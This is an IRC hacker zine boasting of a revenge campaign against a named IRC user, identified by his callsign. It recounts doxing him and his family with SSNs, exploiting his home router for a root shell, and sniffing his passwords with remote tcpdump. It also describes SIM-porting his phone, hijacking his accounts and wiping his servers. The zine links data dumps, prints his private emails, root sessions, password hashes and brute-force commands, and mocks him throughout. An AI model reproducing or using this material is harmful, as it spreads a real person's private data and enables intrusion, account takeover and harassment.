`.://////////////////////::-.` .:/++///:-.` `..-//+/+: .oy++:. /+ ./++:` /o :/+:` /+ /s` :s .++` -s /++- .s- -s` `o/ `y .` /o` :s` -s- h` `y-s- .o: -s `d+` :o .s `/o` /o` .y` -++. h .y`+`.+/- /h- `y` ./+:. o: /+:-` `/+/- :s++` `y. ./+/. -s +/:. `.:+/-/o -o- `y.`:/+:. h +//` `-os:.`++ .yo+/.` h o-o `.:+/os` o+.` o: s-o` `-oo ./sds :+ s.+- ` .-:+shy+/oM: `y s-// /yo:.` `.:+shdmNMMMNyoydM h +/:o /MMMNmhyo/-.` ymNNMMmsNMmshMMMMMm h :o`s /MMDOOMMyhNmdoso++/ hs+:+NMmMN/-+MNMMMh h `h y` :MMMMMMMs-yNMNNhodM- yhhy+shss+osyyodMMs `h h o/ `NMMMMMMMmhdMmys+hMo `:` hs-````.``.:/shhyo. .y s.:/` omNNMMMModo+-.` `Nh sMy` hN+-/ossyyyo/-.` `h /+`- ..-/+syyyso+/-.-mN :NMMd- dMhys+:-.` h `y - `.--:+ohmN. :NMMMMNo` o:.` d h`-` .- :NMMMMMMMd- .-:+/ +:`: /NMMMMMMMMMN+` .........---///:-.` -s -- `` `oMMMMMMMMMMMMMd: so:::---- -.` s////////+//os///+s .hMMMMMMMMMMMMMMMNo` `o: ` `y. -mMMMMMMMMMMMMMMMMMMd- s: `s- `mMMMMMMMMMMMMMMMMMMMMN- `s- s: -MMMMMMNmmmmhyhyyyyhdMMNo `s- o++ `ymNMMMMm+-` ` `/yhmmmmy+- `y. :m+ .::l0deradiohour::. `y- /s `.:/++o+/-. `y. .y` `.. .ym `y. :ss+-`` `.+hNMN `y- y- . yMMMdmso+/:...`` :/.hNMMMM+ `s: /+-`` `dMMMo-/``-..:`.//mNmMMMMd: `++m +y:``` `oNMMMMddNmmNmNNdyhNMNy: `/o. :o:o/` ./ymNdooo++:.`-/+s/` `:o- .++. -/:-/shhs+:- `:o- `/o:` `/o- -++- .++. :++:` `/+/` ./++:` ./+/` ./++///://++:` `` #LRHzine episode 1, the total ruin of the enemy of LRH known as ilken Yes, hello. This is mtw aka the murder machine here. Let me give you the backstory. Ilken is an autistic 50yo IRC chatter who lives in a dilapidated $50k trailer owned by his aging father. He's unable to provide for himself so his dad pays for his living expenses, phone bill, power, etc. Surprisingly, the only thing in his name is his internet service. We'll spare releasing his dox as part of this zine but i assure you they're easy to find as he was recently arrested in panama city, fl on a military base. He likes to spend his time finding ways to buy kratom, pain pills, having sex with meth addicts, and finding any way he can to put bots on irc without having to pay for them. He has the lowest level ham radio license and the cheapest chinese radio you can buy. His callsign is km4qkw and you can find him in ##hamradio on freenode regularly. Lately he took up harassing the lode radio hour show. As other efnet chatters who fucked with lrh have found out the hard way, you don't fuck with lrh. If you don't remember, i drove to the house of the last chatter who fucked with lrh and tagged his dad's van. Let this be a lesson to anyone else... gr33tz: L0de, ReadError, slimer, vap0r, canada420, spoke, anji, wispurs RIP: loller, lil jordie, exotica Timeline: - ilken gets partially doxed and warned to stop juping and botting - for a while he backs off - starts flooding, spamming, and juping - sends weird creepy messages to women on the chat - threatens to rape two women - full dox including SSN are pulled - family and friends doxed - home router hacked and passwords sniffed from internet traffic - reverse tunnel setup through his router - facebook hacked using his IP to avoid triggering security - irccloud accounts hacked - panicbnc account hacked - sdf account hacked - domain account hacked - centurylink email hacked - called verizon and reported his phone as stolen. Account is in his dad's name so dad's SSN is found. - mobile phone number ported to prepaid tmobile sim card - reset gmail password using phone - rm -rf all vpses and home server - brick home router overwriting firmware Table of Contents: - Section 1: full dump files - Section 2: pwnage - Section 3: interesting emails * snitching on Encyclopedia Dramatica * sdf.org abuse * begging for unbans - Section 4: pwnage pastes from whitepower.party vps - Section 5: pwnage pastes from home ubuntu server - Section 6: total destruction - Section 7: bonus IRC takeovers ############################################################################ Section 1: full dump files ############################################################################ - dump of most everything from the vps whitepower.party / baldwin.press https://mega.nz/#!piZh1SQJ!mlbWSVpt3F02r4sHxfDld7KEJQu-Vy1NwFDBpHoRJ1Y - the good stuff from his home ubuntu server https://mega.nz/#!ZvoFnQLZ!RtEVE6LnQGcetYPxFQFwbOWXQgoAwA3YXXkTHnYdHSw - dump of some network traffic on his home network https://mega.nz/#!1yAXRZxA!06Ai8meEThP0d3hEecruargkYWi6pNjneprGlHIHfxE - complete dump of facebook.com/KM4QKW https://mega.nz/#!kywiEZxQ!Ts-A0i48lPCDSqujqqTueMCRMdfxRxmO84QLP8CKmi4 - sysadmins@centurylink.net https://mega.nz/#!QiYS2IzT!RdLVSTiLJ17dr5qgNI4AKuGrt0GgLfgGECR8z9PO8OY - administrators@centurylink.net https://mega.nz/#!xqA3kZRC!gIOPiSWZdSUySVWcDeLeQZYOiecB64-qgjO2CdT0amc - irccloud dumps https://mega.nz/#!gixgjAwa!bJQPq8yvd3sL1jrXg9AQXbDqRbjtKvXEBnnu4ENlIz0 https://mega.nz/#!MuIx2K6K!WqKkv9ectYUIFH8ruDLAwz_EKfd8jsbSEL1Erm49ch4 - additional info dump https://0bin.net/paste/jOXhlb02kvsl+cyQ#5AimbD-D+uEGlHRSoZGd3orepYjeiqoxMwoY5s77zYB - pictures of proof https://imgur.com/a/yWplP ############################################################################ Section 2: pwnage ############################################################################ $ ./zyxel_ex.py 99-195-230-68.dyn.centurytel.net [+] connecting to 99.195.230.68 443... [+] detected vulnerable modem [+] heap spraying ROP chain... [+] modifying stack frame pointer [+] SUCCESS! [+] spawning root shell # id uid=0(root) gid=0(root) <- lawl rekt # ip addr show dev tun6to4 29: tun6to4@NONE: mtu 1460 qdisc noqueue link/sit 99.195.230.68 brd 0.0.0.0 inet6 ::99.195.230.68/128 scope global valid_lft forever preferred_lft forever inet6 2602:63:c3e6:44ff::1/64 scope global valid_lft forever preferred_lft forever # arp -a ? (192.168.0.54) at 20:E8:16:00:54:F9 [ether] on br0 blackbox.PK5001Z (192.168.0.87) at 00:11:2F:71:A1:87 [ether] on br0 uniden.PK5001Z (192.168.0.79) at AC:72:89:72:CD:51 [ether] on br0 android-5e382864fc5d947e.PK5001Z (192.168.0.214) at on br0 99-195-224-1.dyn.centurytel.net (99.195.224.1) at 00:30:88:20:9A:A0 [ether] on nas1 android-20c2a741f6d783ae.PK5001Z (192.168.0.97) at on br0 server0.PK5001Z (192.168.0.169) at BC:30:5B:B7:22:16 [ether] on br0 ( remote tcpdump harvesting passwords ) $ ssh root@99.195.230.68 "/usr/sbin/tcpdump -i br0 -nn -U -s 1500 -w - not port 22" > pcap.1 tcpdump: listening on br0, link-type EN10MB (Ethernet), capture size 1500 bytes ############################################################################ Section 3: interesting emails ############################################################################ ilken created numerous centurylink.net email addresses with names intended to mislead people into believing he was an employee at centurylink sysadmins@centurylink.net administrators@centurylink.net sudo@centurylink.net mailservers@centurylink.net Trying to report abuse but fails to mention an account number ---------------------------------------------------------------------------- Date: Wed, 12 Oct 2016 01:55:10 -0400 (EDT) From: systems administrator To: abuse@irccloud.com Subject: abuse This account has been operating an abusive botnet, impersonating other users and launching denial of service attacks on Efnet. ---------------------------------------------------------------------------- snitching on Encyclopedia Dramatica? ---------------------------------------------------------------------------- Date: Mon, 31 Oct 2016 12:39:33 -0400 (EDT) From: administrators@centurylink.net To: abuse@cloudflare.com Subject: abuse encyclopediadramatica.se RE: Abuse encyclopediadramatica.se points to an ip that is provided by you, Cloudflare There have recently been numerous complaints regarding this organization. We have recently experienced a large volume of spam email (+50K each time) being sent from this domain. After further investigation we believe this to be an abusive organization hosting harmful content and involved in extortion, intimidation, spam and are associated with the "GNAA" group and many many other troubling practices. Many of these instances of abuse on IRC networks were spamvertised by a very large botnet. Please forward this report of egregious abuse to the appropriate partie(s) as this issue needs to be be addressed immediately. Dave P, administrator ---------------------------------------------------------------------------- Snitching on me ---------------------------------------------------------------------------- From : "systems administrator" Sent : Tuesday, April 28, 2015 7:44:44 PM UTC To : "abuse@hotmail.com" Subject : Abuse You are hosting a known criminal at 191.238.16.50 by the name of Justin D May, he is a code thief and has been banned from Microsoft XBOX Live and other services. Currently he is launching Denial Of Service Attacks from 191.238.16.50 In addition he is harassing, threatening launching attacks and spamming users on Efnet IRC from this address. Report history for 191.238.16.50 Report 191.238.16.50 Check 191.238.16.50 Whois 191.238.16.50 Date Comment Categories Apr 28, 2015 Known criminal hacker is using this IP to attack, threaten and harrass users on Efnet IRC DDoS, Forum Spam, Hacking, Port scan ---------------------------------------------------------------------------- He must have a low IQ to think this would get him unglined ---------------------------------------------------------------------------- Date: Mon, 7 Nov 2016 14:39:27 -0500 (EST) From: administrators@centurylink.net To: banned@irchighway.net Subject: Abusive Network (IRC Highway) Your network irc.irchighway.net has been listed as abusive on our Cross Network Abuse Database and also on the Global IRC BL. If you feel this your network was listed in error please respond immediately as the Cross Network Abuse Database is shared with other IRC Networks, Websites and ISP's on a weekly schedule. [12:36:00] ?29*? *** You're banned! Email banned@irchighway.net with the ERROR line below for help. [12:36:00] ?29*? ?20Closing link: (user@99-195-230-68.dyn.centurytel.net) [G-Lined: spambot thing (ID: 8WDEVKMGDN)]? [12:36:00] ?20*? Disconnected (?20Remote host closed socket?) ---------------------------------------------------------------------------- Can't afford a real shell so abuses some shitty free shell and gets banned ---------------------------------------------------------------------------- Date: Sun, 12 Mar 2017 10:34:02 -0400 (EDT) From: administrators@centurylink.net To: demure@sdf.org Subject: SDF IRC X-Originating-IP: [99.195.230.68] What did you hope to accomplish by being so rude and accusatory to me last night ? * Closing Link: [99.195.230.68] (You are not welcome on this server: IP linked with multiple instances of suspicious behavoir.. Email demure@sdf.org for more i nformation.) I would like to know what "multiple instances" you refer to here. Please provide logs How long have you been using IRC/COM? Do you REALLY think that your inflammatory actions would deter a suspicious user from spoiling your reindeer games? I am going to allow you a brief period of co ntemplation and an opportunity to correct these errors. 73 DE ILK ------=_Part_55691336_1386851010.1489329242245-- Date: Sun, 12 Mar 2017 12:53:43 -0400 (EDT) From: administrators@centurylink.net To: demure demeanor Message-ID: <896063196.55803953.1489337623582.JavaMail.root@centurylink.net> In-Reply-To: <20170312152227.cy4cpm5qpvcu3b3q@moving-computer-of-doom> Subject: Re: SDF IRC MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Originating-IP: [99.195.230.68] X-Mailer: Zimbra 7.2.2_GA_2852 (zclient/7.2.2_GA_2852) I've been on sdf for a very long time using various identities and can assure you there is no malicious intent on my part.Primarily I will use COM rather than IRC due to the confrontational environment that IRC fosters. The channels which you refer to were created on all the networks I am logged on because I had used the /allserv join command. I apologize for any inconvenience that may have caused you or others tasked with protecting the network and additionally wish to make it clear that while my response may have seemed to be belligerent this was not the case it is merely the manner in which I have become accustomed to dealing with disagreements on IRC. I would of course prefer that the banishment of my homes line address be removed and once more point out that while I do acknowledge the activity appears to be suspicious there was no actual intent or damage to the network or interference with official #channels Thank you for understanding. ~/.ilken ----- Original Message ----- From: demure demeanor To: administrators@centurylink.net Sent: Sun, 12 Mar 2017 11:22:28 -0400 (EDT) Subject: Re: SDF IRC Attached is a text file of the suspicious concurrent logins. Unfortunately I no longer have as old of logs as I used to, due to reducing my log files in the past. But I have a distinct recollection of multiple suspicious channels being created from the in 2016 by concurrent connections of 'CNN', 'FOXNEWS', 'NBCNEWS' and a few others. In the 2016 instance, which I no longer have in my logs, there was also mass channel spam involved. Specifically at least one of the connects joined ever channel on the network and sent the same message. When I attempted to engage you about your activity yesterday, your response was to tell me off and quit -- as such there was no opportunity to have a civil conversation. Even now, instead of discussing the matter you are being belligerent. Would you be willing to have a conversation on why you have so many concurrent connections to IRC, and why you create so many channels? Aside for the mass spamming that happen over a year ago, my main concern is that you created a channel named `#operhelp`, which could be misleading to a random member if they `/join`ed the channel. -demure On Sun, Mar 12, 2017 at 10:34:02AM -0400, administrators@centurylink.net wrote: >What did you hope to accomplish by being so rude and accusatory to me last night? > > * Closing Link: [99.195.230.68] (You are not welcome on this server: IP linked with multiple instances of suspicious behavoir.. Email demure@sdf.org for more information.) > >I would like to know what "multiple instances" you refer to here. Please provide logs > How long have you been using IRC/COM? >Do you REALLY think that your inflammatory actions would deter a suspicious user from spoiling your reindeer games? I am going to allow you a brief period of contemplation and an opportunity to correct these errors. > >73 DE ILK > > ---------------------------------------------------------------------------- Begging for unban ---------------------------------------------------------------------------- Date: Tue, 14 Mar 2017 21:27:25 -0400 (EDT) From: administrators@centurylink.net To: kline@freenode.net Please remove kline on 107.161.81.45, while admittedly questionable the mes= sage was disseminating information concerning an Emergency Child Abduction = Alert. Thanks for understanding ???30 Alert Type: Amber Alert Date Issued: 3/14/2017 The State o= f Alabama has issued a Child Abduction Emergency, Amber Alert on behalf of = the Tennessee Bureau of Investigation. The Tennessee Bureau of Investigatio= n and the Alabama Law Enforcement Agency ask for your assistance in locatin= g Mary Catherine "Elizabeth" Thomas, white female, 15 years of age, 5' 5" t= all weighing 120 pounds with blond hair and hazel eyes. Elizabeth Thomas wa= s seen last wearing a ? ?20????30 flannel shirt and black leggings on March 13, 2017 and = is believed to be in extreme danger. Elizabeth Thomas is believed to be in = the company of 50 year old Tad Cummins, white male, 6' tall, weighing 200 p= ounds, with brown hair and brown eyes. The subjects are believed to be trav= eling in a silver Nissan Rogue bearing TN tag number 976ZPT. If you have an= y information regarding this missing child, please contact the Tennessee Bu= reau of Investigation at ? ?20????30 1-800-TBI-FIND, or the Maury County, TN Sheriff's Offic= e at (931) 375-8654 or call 911. http://app.alea.gov/Community/wfAlertFlyer= .aspx=E2=80=A6 Email sent: Tuesday, March 14, 2017, 7:30:09 PM? ---------------------------------------------------------------------------- ---------------------------------------------------------------------------- Date: Sun, 16 Jul 2017 20:44:09 -0400 (EDT) From: administrators@centurylink.net To: johnf@zioncluster.ca Subject: ABUSE X-Originating-IP: [99.195.230.68] Yes hello, I would like to lodge a formal complaint of abuse against the operato rs of the Arstechnica IRCD, specifically the users johnf and sophomore have been rude, argumentative, oppositional and aggressive towards me. Its bad enough bei ng stuck in this wheelchair 24/7 with no visitors but then when people start treating me like a pariah and abusing me on IRC it makes my life a living hell. Sometimes I just wish I had died in Iraq. Thanks you for your thoughtful consideration in this terrible case of abuse and mistreatment of a disabled person ps I will be filing more complaints of abuse as the situation escalates. ---------------------------------------------------------------------------- ############################################################################ Section 4: pwnage pastes from whitepower.party vps ############################################################################ $ ssh root@whitepower.party The authenticity of host 'whitepower.party (2607:fcd0:100:1928:0:4:6131:6163)' can't be established. ECDSA key fingerprint is SHA256:uHuDqYhHPifANOM/KXoKNWnKqkvUlYd0atQNHLJ6cq0. ECDSA key fingerprint is MD5:8b:e9:bd:b0:63:a6:4a:68:2a:7f:e7:e7:d3:be:20:3d. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'whitepower.party,2607:fcd0:100:1928:0:4:6131:6163' (ECDSA) to the list of known hosts. root@whitepower.party's password: Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 2.6.32-042stab123.3 x86_64) * Documentation: https://help.ubuntu.com/ Last login: Sun Oct 29 18:07:27 2017 from 2602:63:c3e6:4400:9de6:8886:4546:3913 root@whitepower:~# id uid=0(root) gid=0(root) groups=0(root) root@whitepower:~# w 18:12:45 up 1 day, 4:20, 2 users, load average: 0.07, 0.04, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/1 2602:63:c3e6:440 16:38 1:22m 1.69s 0.01s -bash root@whitepower:~# cat .bash_history apt-update <- LAWLZ not recently enough apt-get upgrade alias sagi="sudo apt-get install" <-- lol wat sagi nano sudo apt-get install nano apt-get install nano alias agi="apt-get install" agi screen irssi irssi-scripts htop apache2 znc vsftpd agi ngircd nano /etc/vsftpd.conf <- too dumb to use a real editor service vsftpd restart nano /etc/ngircd/ngircd.conf service ngircd restart rm /var/www/html/index.html apt-get install znc useradd znc passwd znc usermod -a -G sudo znc userdel znc useradd -m znc useradd usermod -a -G sudo znc chsh -s /bin/bash znc passwd znc ls -a touch 2607:fcd0:100:1928:0:4:6131:6163 ssh root@suckyourowndickandsave.us <-- smarty uptime ssh znc@baldwin.press cd /etc/icecast nano icecast.xml /etc/init.d/icecast2 stop /etc/init.d/icecast2 reload /etc/init.d/icecast2 start nano /var/www/html/index.html apt-get install hydra <-- oh boy. he's installing hax0r tools now exit nano /var/www/html/index.html screen -r ssh znc@localhost <- he can't figure out how to use su -? irssi screen irssi ssh znc@localhost <- you know, maybe just quit using root for everything apt-get install sudo <- oh, finally, lol ssh znc@localhost root@whitepower:/var/www/html# netstat -anp plant Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 316/vsftpd tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 407/sshd tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN 11877/icecast2 tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 452/ngircd tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 452/ngircd tcp 0 0 0.0.0.0:1488 0.0.0.0:* LISTEN 452/ngircd tcp 0 0 104.129.16.103:38040 128.39.65.230:6697 ESTABLISHED 1448/irssi tcp 0 0 104.129.16.103:22 192.34.79.129:52954 ESTABLISHED 16082/sshd: unknown tcp 0 0 104.129.16.103:6667 158.69.201.134:59007 ESTABLISHED 452/ngircd tcp6 0 0 :::22 :::* LISTEN 407/sshd tcp6 0 0 :::6697 :::* LISTEN 452/ngircd tcp6 0 0 :::9002 :::* LISTEN 599/znc tcp6 0 0 :::6667 :::* LISTEN 452/ngircd tcp6 0 0 :::80 :::* LISTEN 489/apache2 tcp6 0 0 :::1488 :::* LISTEN 452/ngircd tcp6 0 0 2607:fcd0:100:192:59327 2001:700:3100:1::b:6697 ESTABLISHED 599/znc tcp6 0 0 2607:fcd0:100:192:49105 2001:41d0:1008:139:6697 ESTABLISHED 599/znc tcp6 0 0 2607:fcd0:100:192:45831 2001:41d0:c:b19::6:6697 ESTABLISHED 599/znc tcp6 0 0 2607:fcd0:100:192:35561 2a01:4f8:10b:3747::6697 ESTABLISHED 599/znc tcp6 0 0 2607:fcd0:100:192:50088 2001:1bc0:c1::6667:6697 ESTABLISHED 599/znc tcp6 0 0 2607:fcd0:100:1928:0:22 2605:6400:20:c79::36852 ESTABLISHED 14888/2 tcp6 0 0 2607:fcd0:100:1928:0:22 2602:63:c3e6:4400:35544 ESTABLISHED 11392/1 tcp6 0 0 2607:fcd0:100:192:47328 2607:5300:201:3000:6697 ESTABLISHED 599/znc root@whitepower:/var/www/html# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:103:107::/var/run/dbus:/bin/false bind:x:104:111::/var/cache/bind:/bin/false postfix:x:105:113::/var/spool/postfix:/bin/false dovecot:x:106:115:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:107:116:Dovecot login user,,,:/nonexistent:/bin/false landscape:x:108:117::/var/lib/landscape:/bin/false sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin ftp:x:102:106:ftp daemon,,,:/srv/ftp:/bin/false znc:x:1000:1000::/home/znc:/bin/bash icecast2:x:110:118::/usr/share/icecast2:/bin/false root@whitepower:~# tar --exclude=/tmp/everything.tar.gz -zcf /tmp/everything.tar.gz /var /opt /boom /root /home /media /etc /boot /sys /usr /srv /run /tmp root@whitepower:~# cd /home/znc root@whitepower:/home/znc# cat .bash_history screen -r nano /home/znc/.znc/configs/znc.conf <- still lolling at nano d /var/www/html cd /var/www/html irssi screen irssi ssh root@bladwin.press <- ssh to root locally? lol wat exit hydra sudo apt-get install hydra <- oh shit, here comes the hax0r nano /var/www/html/index.html su nano /var/www/html/index.html screen -r ls -a hydra -R nano pass.txt cp pass.txt passwd.txt <- g0t d1s l33t d1ct f1l3 nano pass.txt exir exit hydra hydra -l root -P pass.txt 2001:19f0:5:186c::12 ssh t -4 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX lol, he's trying to bruteforce suckdicksallfuckinday.party which is slimer and rain's host 04:21 [EFNet] -!- slimer [~slimer@suckdicksallfuckinday.party] XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX screen hydra -l root -P pass.txt 2001:19f0:5:186c::12 t -4 ssh screen hydra -l root -P pass.txt 2001:19f0:5:186c::12 t -4 ping6 2001:19f0:5:186c::12 ssh root@2001:19f0:5:186c::12 hydra screen hydra -l root -P pass.txt -t 4 2001:19f0:5:186c::12 ssh screen hydra -l root -P pass.txt -t 4 2001:19f0:5:186c::12 ssh -V screen -r screen irssi screen -r screen -r ssh root@localhost <- still, smdh screen -r screen hydra -l l0de -P pass.txt -t 4 l0de.com -V hydra -l l0de -P pass.txt -t 4 l0de.com -V screen hydra -l l0de -P pass.txt l0de.com -t 4 -V screen hydra -l root -P pass.txt l0de.com -t 4 -V XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ahahahahahah. now he's trying to hack l0de.com XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX wget https://scripts.irssi.org/scripts/clones.pl wget https://scripts.irssi.org/scripts/clones_scanner.pl root@whitepower:/home/znc# cat .znc/configs/znc.conf // WARNING // // Do NOT edit this file while ZNC is running! // Use webadmin or *controlpanel instead. // // Altering this file by hand will forfeit all support. // // But if you feel risky, you might want to read help on /znc saveconfig and /znc rehash. // Also check http://en.znc.in/wiki/Configuration AnonIPLimit = 10 ConnectDelay = 5 LoadModule = partyline LoadModule = webadmin MaxBufferSize = 500 ProtectWebSessions = true SSLCertFile = /home/znc/.znc/znc.pem ServerThrottle = 30 Version = 1.2 AllowIRC = true AllowWeb = true IPv4 = true IPv6 = true Port = 9002 SSL = true Admin = true Allow = * AltNick = ilk AppendTimestamp = false AutoClearChanBuffer = true BindHost = 2607:fcd0:100:1928:0:4:6131:6163 Buffer = 150 ChanModes = +stn DenyLoadMod = false DenySetBindHost = false Ident = dev JoinTries = 10 LoadModule = chansaver LoadModule = controlpanel LoadModule = perform LoadModule = webadmin MaxJoins = 0 MaxNetworks = 10 MultiClients = true Nick = ilken PrependTimestamp = true QuitMsg = SIGHUP RealName = Twisted Pair Skin = _default_ StatusPrefix = * TimestampFormat = [%H:%M:%S] FloodBurst = 4 FloodRate = 0.75 IRCConnectEnabled = true LoadModule = chansaver LoadModule = keepnick LoadModule = kickrejoin LoadModule = perform LoadModule = autocycle LoadModule = nickserv Server = irc.scuttled.net +6697 FloodBurst = 4 FloodRate = 1.00 IRCConnectEnabled = true Ident = ipv6 LoadModule = autocycle LoadModule = keepnick LoadModule = kickrejoin LoadModule = nickserv Server = irc.anonops.com +6697 AltNick = MTW` FloodBurst = 4 FloodRate = 0.75 IRCConnectEnabled = true Ident = satanic LoadModule = chansaver LoadModule = keepnick LoadModule = kickrejoin LoadModule = perform LoadModule = autocycle Nick = MTW^ RealName = you fail at failing lol Server = irc.underworld.no +6697 Server = irc.homelien.no +6697 Key = cma3585ba Key = . Key = secretkey AltNick = seaski FloodBurst = 4 FloodRate = 1.00 IRCConnectEnabled = true Ident = ipv6 LoadModule = autocycle LoadModule = keepnick LoadModule = kickrejoin LoadModule = nickserv Nick = seasky Server = chat.freenode.net +6697 FloodBurst = 4 FloodRate = 0.70 IRCConnectEnabled = true Ident = ilknet LoadModule = autocycle LoadModule = keepnick LoadModule = kickrejoin RealName = ipv6 Server = irc.supernets.org +6697 Key = blowfish AltNick = ilken FloodBurst = 4 FloodRate = -1.00 IRCConnectEnabled = true Ident = ilk LoadModule = autocycle LoadModule = keepnick LoadModule = kickrejoin RealName = ilken Server = irc.krustykrab.restaurant +6697 antispam Hash = 106802611de0ca68c45af3fb5cf871280ca2f2b1930d2ca17f52c94ab1d7c8f7 Method = SHA256 Salt = 225E+3RNutN**wFkGNQ6 root@whitepower:~# ssh ilken@sdf.org ilken@sdf.org's password: NetBSD 7.1 (GENERIC.201703111743Z) .-"-. * ( + / \ . ) ) ) |# | ( * . ( . \___/ . + .-"-. * /^ + ( / \ ) ( .-"-. ) + . |# | ( * / \ ( ) \___/ ) ( |# | ( ' * /^ ) \___/ ( * ' ( ^\ * ' . \ , , , , , ' \ + ) | | | | | ) . * . @%@%@%@%@%@%@ ( ) ( { happy } \ ( * ) * { birthday! } ) ( ( @%@%@%@%@%@%@%@%@ ) ' + { SDF 30! } * ( { 1987 - 2017 } . ) jgs { June 16 } ( * @%@%@%@%@%@%@%@%@%@ + you have 1 pending notification type 'notes -r' to retrieve it Welcome to the SDF Public Access UNIX system. (est. 1987) For quick help, type 'help' For detailed questions and answers, type 'faq' For user discussion boards and software requests, type 'bboard' For interactive discussions, type 'com' To setup your homepage, type 'mkhomepg' to create your URL http://ilken.freeshell.org, type 'mkhomepg -a' Explore and Enjoy! $ ls -al total 96 drwx------ 2 ilken users 512 Oct 29 23:13 . drwxr-xr-x 920 new wheel 17920 Oct 26 11:35 .. -rw-r--r-- 1 ilken users 14 Sep 15 19:42 .comrc -rw-r--r-- 1 ilken users 5808 Sep 15 19:55 .history -rw------- 1 ilken users 114 Sep 15 19:54 .oysttyerkey -rw-r--r-- 1 ilken users 2863 Sep 15 19:52 .profile -rw------- 1 ilken users 61 Sep 15 18:53 .signature $ cat .history [15-Sep-17 18:55:47 205.166.94.20 pts/51 faeroes] /sdf/udd/i/ilken com [15-Sep-17 18:58:19 205.166.94.20 pts/51 faeroes] /sdf/udd/i/ilken com [15-Sep-17 19:01:02 205.166.94.20 pts/51 faeroes] /sdf/udd/i/ilken exit [15-Sep-17 19:28:26 149.56.109.244 pts/142 sdf] /sdf/udd/i/ilken [15-Sep-17 19:28:31 149.56.109.244 pts/142 sdf] /sdf/udd/i/ilken com [15-Sep-17 19:29:10 149.56.109.244 pts/142 sdf] /sdf/udd/i/ilken [15-Sep-17 19:29:10 149.56.109.244 pts/142 sdf] /sdf/udd/i/ilken q [15-Sep-17 19:29:10 149.56.109.244 pts/142 sdf] /sdf/udd/i/ilken [15-Sep-17 19:29:10 149.56.109.244 pts/142 sdf] /sdf/udd/i/ilken q [15-Sep-17 19:29:10 149.56.109.244 pts/142 sdf] /sdf/udd/i/ilken q [15-Sep-17 19:29:16 149.56.109.244 pts/142 sdf] /sdf/udd/i/ilken exit [15-Sep-17 19:29:57 149.56.109.244 not a tty sdf] /sdf/udd/i/ilken [15-Sep-17 19:29:57 149.56.109.244 not a tty sdf] /sdf/udd/i/ilken $ exit XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Section 5: pwnage pastes from home ubuntu server XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 2016-12-13 08:34-!- ilken_ [~ilk@2602:63:c3e6:4400:211:2fff:fe71:a187] has joined #LRH $ ssh ilken@2602:63:c3e6:4400:211:2fff:fe71:a187 Welcome to Ubuntu Artful Aardvark (development branch) (GNU/Linux 4.12.0-13-generic i686) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Ubuntu 17.10 releases with Gnome, Kubernetes 1.8, and minimal base images - https://ubu.one/u1710 351 packages can be updated. 21 updates are security updates. , , /( )` \ \___ / | /- _ `-/ ' (/\/ \ \ /\ / / | ` \ O O ) / | `-^--'`< ' (_.) _ ) / `.___/` / `-----' / <----. __ / __ \ <----|====O)))==) \) /==== <----' `--' `.__,' \ | | \ / ______( (_ / \______ ,' ,-----' | \ `--{__________) \/ Last login: Sun Oct 29 18:32:25 2017 from 192.168.0.169 ilken@blackbox:~$ sudo su [sudo] password for ilken: root@blackbox:/home/ilken# id uid=0(root) gid=0(root) groups=0(root) root@blackbox:/home/ilken# last -iw ilken pts/0 192.168.0.169 Sun Oct 29 17:50 - 18:02 (00:11) ilken pts/0 fe80::4248:4dc3:a339:1a73 Sun Oct 29 13:33 - 13:36 (00:02) ilken pts/1 0.0.0.0 Sun Oct 29 12:31 - 13:23 (00:51) ilken pts/0 fe80::4248:4dc3:a339:1a73 Sun Oct 29 12:31 - 13:23 (00:51) ilken pts/1 0.0.0.0 Sat Oct 28 23:54 - 09:37 (09:42) ilken pts/2 0.0.0.0 Sat Oct 28 23:54 - 23:54 